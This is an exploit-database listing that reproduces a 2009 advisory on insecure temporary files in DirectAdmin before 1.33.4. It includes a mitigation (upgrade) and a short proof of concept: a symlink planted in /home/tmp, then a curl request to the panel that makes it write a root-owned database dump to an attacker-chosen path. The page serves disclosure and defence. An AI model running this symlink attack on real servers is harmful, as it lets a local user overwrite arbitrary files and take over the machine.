header-logo
Suggest Exploit
vendor:
DirectAdmin
by:
SecurityFocus
7.2
CVSS
HIGH
Symbolic Link Attack
59
CWE
Product Name: DirectAdmin
Affected Version From: Prior to DirectAdmin 1.33.4
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:directadmin:directadmin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DirectAdmin creates temporary files in an insecure manner

An attacker with local access could potentially exploit this issue to perform symbolic link attacks to overwrite arbitrary attacker-specified files. This could facilitate a complete compromise of the affected computer.

Mitigation:

Upgrade to DirectAdmin 1.33.4 or later
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34676/info

DirectAdmin creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symbolic link attacks to overwrite arbitrary attacker-specified files. This could facilitate a complete compromise of the affected computer.

Versions prior to DirectAdmin 1.33.4 are vulnerable. 

On server: $ ln -s /etc/poc /home/tmp/database_name.gz
On client: $ curl http://www.example.com:2222/CMD_DB/database_name.gz
On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc
$ zcat /etc/poc | head -1
-- MySQL dump 10.9